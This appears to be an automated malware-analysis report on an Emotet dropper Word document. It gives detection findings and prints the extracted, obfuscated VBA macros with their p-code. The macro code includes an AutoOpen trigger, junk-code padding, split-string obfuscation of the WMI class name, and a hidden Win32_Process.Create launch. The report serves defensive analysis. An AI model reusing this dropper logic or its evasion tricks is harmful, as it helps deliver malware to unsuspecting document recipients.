MALICIOUS
270
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Emotet-6959413-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-6959413-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set cXAAQAUB = bZxwAA(GetObject("winm" + "gm" + "ts" + ":W" + _ -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set cXAAQAUB = bZxwAA(GetObject("winm" + "gm" + "ts" + ":W" + _ -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set cXAAQAUB = bZxwAA(GetObject("winm" + "gm" + "ts" + ":W" + _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36105 bytes |
SHA-256: c2c03482b5822b6f701c10a4b38e3d59ec07519b5f22f091aadad504224a6bf6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UAACGAAD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AAAAQQ"
Attribute VB_Base = "0{0B512284-F430-4506-9FC2-FCBE06F503A0}{7E520107-E053-4282-9B9B-B41B090D7AD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "fAU41oQ"
Attribute VB_Base = "0{B949597E-A9F2-475D-9C7C-986D6019A202}{0A1B9E09-687F-43E4-937A-F49267DEF3CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BAABAA_A"
Sub autoopen()
If UDAAAAG = kAwcAU_ Then
ElseIf fAUoZDAA = dBAc1cUA Then
PAwAADB = Hex(akkwAo1G + CSng(cAXACDCU / Tan(167129488 + 903275107)))
ElseIf SQAQGDcA = LCAB_AA Then
Po_kGk = Atn(107327096) + Int(258044091)
ElseIf zUAQAQAX = KU_AxB Then
U4AAAAUc = 909912934 + Atn(664243028)
End If
If KwXXAQBw = QoAUZD Then
ElseIf aBC4AAAk = VZw4B_Q Then
QB1UA1 = Hex(XXUAUkC + CSng(n4_D1kB / Tan(70089877 + 815851515)))
ElseIf mA4ABD = KX41ow_C Then
kUAwAU = Atn(155522645) + Int(456909790)
ElseIf k_AZGA = iQBAAAA Then
RBkBXA = 994008663 + Atn(122647363)
End If
SAD1xU
If ScwCBA_ = w_DxAAA Then
ElseIf KUB41B = MAADGD_ Then
UXAcAX = Hex(jxDCAG + CSng(zDAGQGG / Tan(163801526 + 948138119)))
ElseIf MQ1DoA = wQwAwC Then
bUG_GA4G = Atn(733478620) + Int(579349806)
ElseIf lQXxGAA = iXUAAx Then
RUAXxk_1 = 49063898 + Atn(490386888)
End If
If mwAQAAxo = fxBAB4AB Then
ElseIf s1ADCA = lA1DoB Then
XQAUBXkX = Hex(YxUDAQA + CSng(XQDAx4 / Tan(877846445 + 163344670)))
ElseIf akxUAAA = nGAAAB Then
nDZZAQ = Atn(424307267) + Int(499486010)
ElseIf zADGxDU = X1AXAk Then
Y1QGAwB = 120015408 + Atn(795266781)
End If
If hcBDxDUQ = rU1_4AQ Then
ElseIf nwDxZx = hB41kUkX Then
RQ1_U_UA = Hex(U1BBB4AA + CSng(DAAAAGQw / Tan(729179840 + 15538554)))
ElseIf ZAAAU1 = QDACUD1 Then
Zo_AAA1X = Atn(32972560) + Int(708786670)
ElseIf ZUCBkQkA = bAAAUcDo Then
B_wAUAD = 781196586 + Atn(151843644)
End If
End Sub
Function bZxwAA(B1GAoDAw)
If qQ1BQkA = SUGBGXUo Then
ElseIf WcAQc_A = V1AGBBx Then
UAGU4X1 = Hex(BXAAACUU + CSng(M1DAQ1GA / Tan(613672690 + 722188243)))
ElseIf iAA_Qo = kA4A4Uo Then
pCAwDA = Atn(314052721) + Int(303530607)
ElseIf EABGGA = TAQXBAc Then
kABAAU4A = 765273534 + Atn(381075805)
End If
If lQowxQAw = wADAAXGB Then
ElseIf iQAA_DUA = jAAAwDA Then
SAAAUA = Hex(R1AGAGQ + CSng(WAAAABDQ / Tan(33840446 + 722655753)))
ElseIf kQC1ZA = tAxAUD Then
zABUQ1GX = Atn(632101263) + Int(402936384)
ElseIf zUGDAQA = UkAAAA Then
WCUDAB = 974832332 + Atn(144534929)
End If
Set bZxwAA = CVar(B1GAoDAw)
If zUA1Ao = j_kAAAQQ Then
ElseIf lBxACABU = MAkBxGQC Then
hwABUDA = Hex(wGDQkCUX + CSng(zUUAAZDD / Tan(568937986 + 301147285)))
ElseIf rBxXZ4Xw = TcBDAQ Then
Q__XCAC = Atn(901336385) + Int(323025183)
ElseIf mAoDxB = wAkxDoA Then
mBA4DCcA = 501981629 + Atn(653549993)
End If
If AAQAQAUB = C4cUDD Then
ElseIf b_QAco4 = ckcUBA Then
TAUkcA1 = Hex(cADAUA + CSng(qwAB_AX / Tan(661794038 + 687471328)))
ElseIf KGwC4Ac = WQUA1ADA Then
IUAAxU = Atn(53140914) + Int(805866431)
ElseIf KAAoBA = tAXUkA Then
rDQQQU = 908092635 + Atn(536415111)
End If
If XGUAcG1 = A_ocAAA Then
ElseIf iAcxAAA = hAwAkBo1 Then
pZoZXAQQ = Hex(LkAXA_ + CSng(XxDQBAA / Tan(619926155 + 331780995)))
ElseIf CkZBAZc = oDoDBcQ Then
CBAoABD = Atn(911052758) + Int(21219677)
ElseIf sB1ZXADA = jAUUBDkc Then
TkD1AUAB = 641680204 + Atn(222256229)
End If
End Function
Attribute VB_Name = "swQQAAA"
Function SAD1xU()
On Error Resume Next
If fAUACBA = hBZAA1D Then
ElseIf RAXUCD = UA4AAQU Then
RZXBADoA = Hex(ioU11U + CSng(qAADAZD / Tan(179491186 + 182610318)))
ElseIf LDQxQcBk = bAC_1AU Then
PAcAADA = Atn(972480856) + Int(459572607)
ElseIf lAQCAc = IAAACD1A Then
mQGZBABA = 809945142 + Atn(872911172)
End If
If n_QQAXA = FUAAUQc Then
ElseIf V1xA1AAQ = oxBAD1o Then
rA_ADA = Hex(GAAoAk + CSng(TQxX1Zo / Tan(395935840 + 638553378)))
ElseIf b1_oQAo = zAABUAC Then
hZA4AcAB = Atn(765983794) + Int(832053999)
ElseIf E4xQAAG = DUoDQA Then
nkQQUxB = 715102712 + Atn(935470647)
End If
If 4700 < 21337 Then
H1UAc_B_ = vbFalse
If wAAADwXA = jADDkQ Then
ElseIf zUQ_cAcQ = JxkG_UAA Then
wxZDXw = Hex(JD4oGUU1 + CSng(OADQxwA / Tan(468404325 + 55981308)))
ElseIf kAQBAAc = NAAkDBU1 Then
wAACAwG = Atn(401422457) + Int(14927720)
ElseIf mXcD_AA = hADAAQUw Then
qDkAAA = 360917099 + Atn(993061701)
End If
If WD_wAxD = zZxZQAAC Then
ElseIf mAAAwGo = pQko_D Then
iBQCUGQA = Hex(NDUAUAG + CSng(bCAQAAA / Tan(953529872 + 1737911)))
ElseIf dkwUADX = TDU_14 Then
ZDQXGBxA = Atn(406416257) + Int(315512455)
ElseIf XAQokAk = D1AkAAAQ Then
XUQ_AD = 456419017 + Atn(892112200)
End If
End If
If kAxAUA = cGA1wQAo Then
ElseIf awAAAA = QAACXD Then
qQAQkAwQ = Hex(wwBABQ + CSng(qQDDBDA / Tan(177113150 + 606594387)))
ElseIf fZUAAAD = CDcUAA Then
TAAAUA = Atn(525316128) + Int(416620666)
ElseIf kA1CAQA = Mo4AXADU Then
kwQkAAA = 706532016 + Atn(694609304)
End If
If WUAXAA = zQkAo1G Then
ElseIf vxQAx1_ = XB_kDAo Then
iAxcAAQ = Hex(MwAAUA__ + CSng(sUk4GZAA / Tan(182261979 + 833877705)))
ElseIf cZAxAQ = SAGBA1 Then
sAGAQo = Atn(523991843) + Int(147555302)
ElseIf RZQAAZ = j1AUxA Then
hCAQAUAc = 322863570 + Atn(147008970)
End If
Set cXAAQAUB = bZxwAA(GetObject("winm" + "gm" + "ts" + ":W" + _
"in32_P" + "rocess" + "Sta" + "rtup"))
If iAUXAkAG = UAZU4A Then
ElseIf EAcQGABc = ZAQACD Then
wAAA_AA = Hex(nQUAkDAA + CSng(GAAAAwAX / Tan(689775875 + 388863670)))
ElseIf UAxXUDAB = O1DAZxD Then
zBAABA1 = Atn(371628485) + Int(598307493)
ElseIf Yx4oA4 = iXAQUQ_B Then
mxAAoAAw = 54473429 + Atn(203363384)
End If
If RAQoAA = TDcokoA Then
ElseIf FXQcGxAA = GA__DDZ Then
rXAAQUA = Hex(ZQUkDA + CSng(jDGQZAA / Tan(601912151 + 278467640)))
ElseIf voAAAUAZ = z4DBkQ Then
AGUZAUUA = Atn(591418969) + Int(321370803)
ElseIf WZQUBAUo = BAxQU_A Then
O1AACwA = 468924016 + Atn(390751247)
End If
vUQccc = AAAAQQ.lU_QkDwA.PasswordChar + fAU41oQ.uwAoAk + AAAAQQ.lU_QkDwA + fAU41oQ.UDxoAwA + AAAAQQ.lU_QkDwA + AAAAQQ.lU_QkDwA.ControlTipText + fAU41oQ.jAAABDD + AAAAQQ.lU_QkDwA.ControlTipText + AAAAQQ.lU_QkDwA.ControlSource + fAU41oQ.lAAXkDCk + AAAAQQ.lU_QkDwA.PasswordChar + fAU41oQ.joUUUQ4 + AAAAQQ.lU_QkDwA.PasswordChar
If 3144 < 19004 Then
If XxwcAo = VAAA1QA Then
ElseIf mwUGAB = WXwAUA4 Then
aAcAA1 = Hex(oBUA_UQX + CSng(YGDxXG_ / Tan(303633998 + 675158565)))
ElseIf CBAUAxAZ = wCQAAA Then
pU_UcAwQ = Atn(479129889) + Int(632646122)
ElseIf S4BcAA = QDAGDUQA Then
wQQDoX_ = 653676939 + Atn(862140461)
End If
If DxAABA = qocoAowZ Then
ElseIf PZQQQQ4k = wQ4QAx Then
qAAAGZX = Hex(z__wGDG1 + CSng(PZo1AxB / Tan(855916796 + 25230260)))
ElseIf l1AoGcB = PB1BAAAB Then
vAA4AoAA = Atn(434779217) + Int(394271750)
ElseIf JcQAAxD = GAwDAw Then
EGx4ADXG = 693031439 + Atn(294165429)
End If
If XAAAAB = rAAQG4 Then
ElseIf GAUkUA = EA1AB_4 Then
oUAxkAA = Hex(jQcAABx + CSng(RZBQAAQ / Tan(711184711 + 464237984)))
ElseIf VDxAAA = QxxAAo Then
jAwAAZC = Atn(260738952) + Int(863648506)
ElseIf ikwU_D = NQAcAA Then
YAAkAQ = 126748600 + Atn(101917229)
End If
cXAAQAUB. _
ShowWindow = H1UAc_B_ + H1UAc_B_ + H1UAc_B_ + H1UAc_B_
If oQXAQGA = jkcAQo4D Then
ElseIf OAAA1ADD = PBcDAwAx Then
MGQAAUUC = Hex(LDAAoAA + CSng(A_44xUQA / Tan(918954417 + 481736723)))
ElseIf f1AZ4kD4 = HABBXx Then
iXADQD = Atn(630246681) + Int(70595163)
ElseIf wA__wA4A = OACAAQ Then
B_ZQQU = 898653884 + Atn(377073295)
End If
If w1Bkkcwo = lGAABAC Then
ElseIf jAAcAxoA = KQAUoA Then
GBQA_AAA = Hex(kAA4AcD + CSng(QZkAwx / Tan(619369508 + 700327053)))
ElseIf OBADZA = SAAAAA Then
nA4_A1 = Atn(873761656) + Int(520864882)
ElseIf z41ABA = pAADCQAU Then
ucwwoXAA = 85915758 + Atn(420812452)
End If
If dQAkAkA = GQAXC_AB Then
ElseIf HBQ1AoC = lBAAQwAc Then
vZAkAcZ = Hex(zGACZAU + CSng(aQwkZ4 / Tan(353112553 + 314548707)))
ElseIf HCZZcXkA = v1UXA4xU Then
UUBA_w = Atn(128895306) + Int(803501870)
ElseIf oA4QQA = SADQAC Then
IxQoBc = 706397773 + Atn(146808023)
End If
End If
If SBUCk_ = U4XBCAXA Then
ElseIf nBk_xB = IQ4X_c Then
pAQAAD = Hex(bQ1QX1 + CSng(I4AAAo / Tan(853947444 + 821070266)))
ElseIf OUAXkwQA = Kk4G_B Then
NDkoAB = Atn(25373498) + Int(867547618)
ElseIf CAwUw4A = RADcDD Then
CxUXwC4B = 686640370 + Atn(675758755)
End If
If JXAZBC = PA1AAUAo Then
ElseIf rBADkG = MAUDcUAA Then
vBoQoUD = Hex(HCkADADB + CSng(EDDXkUAQ / Tan(188102999 + 815199916)))
ElseIf TXAc41A = BxoAQkAA Then
qCkAAQD = Atn(754965908) + Int(86025931)
ElseIf u1oZBAAD = aAxAAZ Then
dA_AXDU = 267228378 + Atn(750926648)
End If
Set hAQBoDw = bZxwAA(GetObject("winm" + "gm" + "ts" + ":W" _
+ "in32_P" + "rocess"))
If nQADcAB = TAkQk4 Then
ElseIf MABX_AC = JBQQQA Then
sAAC1A = Hex(RcCBxwo + CSng(jGXD1AUQ / Tan(689858923 + 866588119)))
ElseIf YoBwAA = ickQBkA Then
NCc_DA_A = Atn(698396755) + Int(572960408)
ElseIf W4Q4Ao = hBcD_DA Then
pAAUAAA = 751720548 + Atn(700902809)
End If
If UA_ADA = C_xo_XU Then
ElseIf BQDBAc = jBAXAQ Then
wxAAAUAA = Hex(DAUoBcAU + CSng(UABAQUAQ / Tan(512300780 + 186697656)))
ElseIf wC_XAAQA = FBAcQAA Then
RAXBAA = Atn(302268938) + Int(848284546)
ElseIf iQBcDAQ = iAACAAwA Then
HxAUAGQQ = 375013394 + Atn(838595592)
End If
hAQBoDw.Create ZAGADA + vUQccc + wAA1AAG, zxAADAUB, cXAAQAUB, IBBAZAA
If hAUAC1AC = ZcACUc__ Then
ElseIf f_QAAB = aAA4BCZ Then
NDwGxAQA = Hex(i1DAACAk + CSng(NAUwA_x / Tan(10546202 + 902549169)))
ElseIf YAkXkXA = zUQAZAk Then
jCBAc4AC = Atn(996952950) + Int(434421584)
ElseIf okCAkA = zQ_QABo1 Then
AAAAAXQk = 153798287 + Atn(523843294)
End If
If zAcAUAU4 = XUoA1U Then
ElseIf mQxBQQ = q4kU4U1A Then
IwGAcQx = Hex(kcZA1XB + CSng(lUAw1UA / Tan(115961876 + 486098058)))
ElseIf nDUAGQ4 = cABZAGU1 Then
KAxQAADC = Atn(942011943) + Int(960896852)
ElseIf PXUQ4A_c = LBcZBQc Then
zAAABAA1 = 602229770 + Atn(302881999)
End If
If vBAAAUAU = HAcAcA Then
ElseIf GUooQA = WxAAACBo Then
q1AwAcxQ = Hex(fXQZDU + CSng(AxxAAB / Tan(959267829 + 778817785)))
ElseIf sXBDBxCo = ZAoAZG1A Then
EQADoA = Atn(926880696) + Int(900100859)
ElseIf NAADAkGZ = d_1QUkA1 Then
dUZBBAC = 209733015 + Atn(223540907)
End If
End Function
' Processing file: /opt/analyzer/scan_staging/bd561e3b426d4753b69b4194a8d999a9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/UAACGAAD - 1106 bytes
' Macros/VBA/AAAAQQ - 1156 bytes
' Macros/VBA/fAU41oQ - 1158 bytes
' Macros/VBA/BAABAA_A - 5685 bytes
' Line #0:
' FuncDefn (Sub BAABAA_A())
' Line #1:
' Ld autoopen
' Ld UDAAAAG
' Eq
' IfBlock
' Line #2:
' Ld kAwcAU_
' Ld fAUoZDAA
' Eq
' ElseIfBlock
' Line #3:
' Ld PAwAADB
' Ld akkwAo1G
' LitDI4 0x3190 0x09F6
' LitDI4 0xE263 0x35D6
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St dBAc1cUA
' Line #4:
' Ld cAXACDCU
' Ld SQAQGDcA
' Eq
' ElseIfBlock
' Line #5:
' LitDI4 0xAE78 0x0665
' ArgsLd Atn 0x0001
' LitDI4 0x70BB 0x0F61
' FnInt
' Add
' St LCAB_AA
' Line #6:
' Ld Po_kGk
' Ld zUAQAQAX
' Eq
' ElseIfBlock
' Line #7:
' LitDI4 0x2B66 0x363C
' LitDI4 0x8B54 0x2797
' ArgsLd Atn 0x0001
' Add
' St KU_AxB
' Line #8:
' EndIfBlock
' Line #9:
' Ld U4AAAAUc
' Ld KwXXAQBw
' Eq
' IfBlock
' Line #10:
' Ld QoAUZD
' Ld aBC4AAAk
' Eq
' ElseIfBlock
' Line #11:
' Ld QB1UA1
' Ld XXUAUkC
' LitDI4 0x7C95 0x042D
' LitDI4 0xE7FB 0x30A0
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St VZw4B_Q
' Line #12:
' Ld n4_D1kB
' Ld mA4ABD
' Eq
' ElseIfBlock
' Line #13:
' LitDI4 0x1655 0x0945
' ArgsLd Atn 0x0001
' LitDI4 0xE3DE 0x1B3B
' FnInt
' Add
' St KX41ow_C
' Line #14:
' Ld kUAwAU
' Ld k_AZGA
' Eq
' ElseIfBlock
' Line #15:
' LitDI4 0x5E57 0x3B3F
' LitDI4 0x7343 0x074F
' ArgsLd Atn 0x0001
' Add
' St iQBAAAA
' Line #16:
' EndIfBlock
' Line #17:
' ArgsCall RBkBXA 0x0000
' Line #18:
' Ld SAD1xU
' Ld ScwCBA_
' Eq
' IfBlock
' Line #19:
' Ld w_DxAAA
' Ld KUB41B
' Eq
' ElseIfBlock
' Line #20:
' Ld UXAcAX
' Ld jxDCAG
' LitDI4 0x69B6 0x09C3
' LitDI4 0x7087 0x3883
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St MAADGD_
' Line #21:
' Ld zDAGQGG
' Ld MQ1DoA
' Eq
' ElseIfBlock
' Line #22:
' LitDI4 0xFEDC 0x2BB7
' ArgsLd Atn 0x0001
' LitDI4 0x2D2E 0x2288
' FnInt
' Add
' St wQwAwC
' Line #23:
' Ld bUG_GA4G
' Ld lQXxGAA
' Eq
' ElseIfBlock
' Line #24:
' LitDI4 0xA7DA 0x02EC
' LitDI4 0xB5C8 0x1D3A
' ArgsLd Atn 0x0001
' Add
' St iXUAAx
' Line #25:
' EndIfBlock
' Line #26:
' Ld RUAXxk_1
' Ld mwAQAAxo
' Eq
' IfBlock
' Line #27:
' Ld fxBAB4AB
' Ld s1ADCA
' Eq
' ElseIfBlock
' Line #28:
' Ld XQAUBXkX
' Ld YxUDAQA
' LitDI4 0xDFAD 0x3452
' LitDI4 0x711E 0x09BC
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St lA1DoB
' Line #29:
' Ld XQDAx4
' Ld akxUAAA
' Eq
' ElseIfBlock
' Line #30:
' LitDI4 0x6A43 0x194A
' ArgsLd Atn 0x0001
' LitDI4 0x8D3A 0x1DC5
' FnInt
' Add
' St nGAAAB
' Line #31:
' Ld nDZZAQ
' Ld zADGxDU
' Eq
' ElseIfBlock
' Line #32:
' LitDI4 0x4A30 0x0727
' LitDI4 0xCEDD 0x2F66
' ArgsLd Atn 0x0001
' Add
' St X1AXAk
' Line #33:
' EndIfBlock
' Line #34:
' Ld Y1QGAwB
' Ld hcBDxDUQ
' Eq
' IfBlock
' Line #35:
' Ld rU1_4AQ
' Ld nwDxZx
' Eq
' ElseIfBlock
' Line #36:
' Ld RQ1_U_UA
' Ld U1BBB4AA
' LitDI4 0x66C0 0x2B76
' LitDI4 0x197A 0x00ED
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St hB41kUkX
' Line #37:
' Ld DAAAAGQw
' Ld ZAAAU1
' Eq
' ElseIfBlock
' Line #38:
' LitDI4 0x1F10 0x01F7
' ArgsLd Atn 0x0001
' LitDI4 0x39EE 0x2A3F
' FnInt
' Add
' St QDACUD1
' Line #39:
' Ld Zo_AAA1X
' Ld ZUCBkQkA
' Eq
' ElseIfBlock
' Line #40:
' LitDI4 0x1D2A 0x2E90
' LitDI4 0xF33C 0x090C
' ArgsLd Atn 0x0001
' Add
' St bAAAUcDo
' Line #41:
' EndIfBlock
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Function B_wAUAD(bZxwAA))
' Line #44:
' Ld B1GAoDAw
' Ld qQ1BQkA
' Eq
' IfBlock
' Line #45:
' Ld SUGBGXUo
' Ld WcAQc_A
' Eq
' ElseIfBlock
' Line #46:
' Ld UAGU4X1
' Ld BXAAACUU
' LitDI4 0xE6F2 0x2493
' LitDI4 0xB7D3 0x2B0B
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St V1AGBBx
' Line #47:
' Ld M1DAQ1GA
' Ld iAA_Qo
' Eq
' ElseIfBlock
' Line #48:
' LitDI4 0x1071 0x12B8
' ArgsLd Atn 0x0001
' LitDI4 0x826F 0x1217
' FnInt
' Add
' St kA4A4Uo
' Line #49:
' Ld pCAwDA
' Ld EABGGA
' Eq
' ElseIfBlock
' Line #50:
' LitDI4 0x25BE 0x2D9D
' LitDI4 0xC15D 0x16B6
' ArgsLd Atn 0x0001
' Add
' St TAQXBAc
' Line #51:
' EndIfBlock
' Line #52:
' Ld kABAAU4A
' Ld lQowxQAw
' Eq
' IfBlock
' Line #53:
' Ld wADAAXGB
' Ld iQAA_DUA
' Eq
' ElseIfBlock
' Line #54:
' Ld SAAAUA
' Ld R1AGAGQ
' LitDI4 0x5D3E 0x0204
' LitDI4 0xDA09 0x2B12
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St jAAAwDA
' Line #55:
' Ld WAAAABDQ
' Ld kQC1ZA
' Eq
' ElseIfBlock
' Line #56:
' LitDI4 0x198F 0x25AD
' ArgsLd Atn 0x0001
' LitDI4 0x5240 0x1804
' FnInt
' Add
' St tAxAUD
' Line #57:
' Ld zABUQ1GX
' Ld zUGDAQA
' Eq
' ElseIfBlock
' Line #58:
' LitDI4 0xC2CC 0x3A1A
' LitDI4 0x6D91 0x089D
' ArgsLd Atn 0x0001
' Add
' St UkAAAA
' Line #59:
' EndIfBlock
' Line #60:
' SetStmt
' Ld bZxwAA
' Coerce (Var)
' Set B_wAUAD
' Line #61:
' Ld WCUDAB
' Ld zUA1Ao
' Eq
' IfBlock
' Line #62:
' Ld j_kAAAQQ
' Ld lBxACABU
' Eq
' ElseIfBlock
' Line #63:
' Ld hwABUDA
' Ld wGDQkCUX
' LitDI4 0x4E02 0x21E9
' LitDI4 0x2495 0x11F3
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St MAkBxGQC
' Line #64:
' Ld zUUAAZDD
' Ld rBxXZ4Xw
' Eq
' ElseIfBlock
' Line #65:
' LitDI4 0x4D41 0x35B9
' ArgsLd Atn 0x0001
' LitDI4 0xF91F 0x1340
' FnInt
' Add
' St TcBDAQ
' Line #66:
' Ld Q__XCAC
' Ld mAoDxB
' Eq
' ElseIfBlock
' Line #67:
' LitDI4 0xA1BD 0x1DEB
' LitDI4 0x61A9 0x26F4
' ArgsLd Atn 0x0001
' Add
' St wAkxDoA
' Line #68:
' EndIfBlock
' Line #69:
' Ld mBA4DCcA
' Ld AAQAQAUB
' Eq
' IfBlock
' Line #70:
' Ld C4cUDD
' Ld b_QAco4
' Eq
' ElseIfBlock
' Line #71:
' Ld TAUkcA1
' Ld cADAUA
' LitDI4 0x2CF6 0x2772
' LitDI4 0xFAE0 0x28F9
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St ckcUBA
' Line #72:
' Ld qwAB_AX
' Ld KGwC4Ac
' Eq
' ElseIfBlock
' Line #73:
' LitDI4 0xDDB2 0x032A
' ArgsLd Atn 0x0001
' LitDI4 0x8BBF 0x3008
' FnInt
' Add
' St WQUA1ADA
' Line #74:
' Ld IUAAxU
' Ld KAAoBA
' Eq
' ElseIfBlock
' Line #75:
' LitDI4 0x64DB 0x3620
' LitDI4 0x0B87 0x1FF9
' ArgsLd Atn 0x0001
' Add
' St tAXUkA
' Line #76:
' EndIfBlock
' Line #77:
' Ld rDQQQU
' Ld XGUAcG1
' Eq
' IfBlock
' Line #78:
' Ld A_ocAAA
' Ld iAcxAAA
' Eq
' ElseIfBlock
' Line #79:
' Ld pZoZXAQQ
' Ld LkAXA_
' LitDI4 0x528B 0x24F3
' LitDI4 0x9383 0x13C6
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St hAwAkBo1
' Line #80:
' Ld XxDQBAA
' Ld CkZBAZc
' Eq
' ElseIfBlock
' Line #81:
' LitDI4 0x8FD6 0x364D
' ArgsLd Atn 0x0001
' LitDI4 0xC95D 0x0143
' FnInt
' Add
' St oDoDBcQ
' Line #82:
' Ld CBAoABD
' Ld sB1ZXADA
' Eq
' ElseIfBlock
' Line #83:
' LitDI4 0x434C 0x263F
' LitDI4 0x5C65 0x0D3F
' ArgsLd Atn 0x0001
' Add
' St jAUUBDkc
' Line #84:
' EndIfBlock
' Line #85:
' EndFunc
' Macros/VBA/swQQAAA - 11665 bytes
' Line #0:
' FuncDefn (Function RBkBXA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld swQQAAA
' Ld fAUACBA
' Eq
' IfBlock
' Line #3:
' Ld hBZAA1D
' Ld RAXUCD
' Eq
' ElseIfBlock
' Line #4:
' Ld RZXBADoA
' Ld ioU11U
' LitDI4 0xD172 0x0AB2
' LitDI4 0x698E 0x0AE2
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St UA4AAQU
' Line #5:
' Ld qAADAZD
' Ld LDQxQcBk
' Eq
' ElseIfBlock
' Line #6:
' LitDI4 0xE158 0x39F6
' ArgsLd Atn 0x0001
' LitDI4 0x857F 0x1B64
' FnInt
' Add
' St bAC_1AU
' Line #7:
' Ld PAcAADA
' Ld lAQCAc
' Eq
' ElseIfBlock
' Line #8:
' LitDI4 0xC836 0x3046
' LitDI4 0x9144 0x3407
' ArgsLd Atn 0x0001
' Add
' St IAAACD1A
' Line #9:
' EndIfBlock
' Line #10:
' Ld mQGZBABA
' Ld n_QQAXA
' Eq
' IfBlock
' Line #11:
' Ld FUAAUQc
' Ld V1xA1AAQ
' Eq
' ElseIfBlock
' Line #12:
' Ld rA_ADA
' Ld GAAoAk
' LitDI4 0x8060 0x1799
' LitDI4 0x8D22 0x260F
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St oxBAD1o
' Line #13:
' Ld TQxX1Zo
' Ld b1_oQAo
' Eq
' ElseIfBlock
' Line #14:
' LitDI4 0xFC32 0x2DA7
' ArgsLd Atn 0x0001
' LitDI4 0x22EF 0x3198
' FnInt
' Add
' St zAABUAC
' Line #15:
' Ld hZA4AcAB
' Ld E4xQAAG
' Eq
' ElseIfBlock
' Line #16:
' LitDI4 0x99F8 0x2A9F
' LitDI4 0x2637 0x37C2
' ArgsLd Atn 0x0001
' Add
' St DUoDQA
' Line #17:
' EndIfBlock
' Line #18:
' LitDI2 0x125C
' LitDI2 0x5359
' Lt
' IfBlock
' Line #19:
' Ld H1UAc_B_
' St nkQQUxB
' Line #20:
' Ld vbFalse
' Ld wAAADwXA
' Eq
' IfBlock
' Line #21:
' Ld jADDkQ
' Ld zUQ_cAcQ
' Eq
' ElseIfBlock
' Line #22:
' Ld wxZDXw
' Ld JD4oGUU1
' LitDI4 0x4865 0x1BEB
' LitDI4 0x34FC 0x0356
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St JxkG_UAA
' Line #23:
' Ld OADQxwA
' Ld kAQBAAc
' Eq
' ElseIfBlock
' Line #24:
' LitDI4 0x3879 0x17ED
' ArgsLd Atn 0x0001
' LitDI4 0xC768 0x00E3
' FnInt
' Add
' St NAAkDBU1
' Line #25:
' Ld wAACAwG
' Ld mXcD_AA
' Eq
' ElseIfBlock
' Line #26:
' LitDI4 0x286B 0x1583
' LitDI4 0xEB45 0x3B30
' ArgsLd Atn 0x0001
' Add
' St hADAAQUw
' Line #27:
' EndIfBlock
' Line #28:
' Ld qDkAAA
' Ld WD_wAxD
' Eq
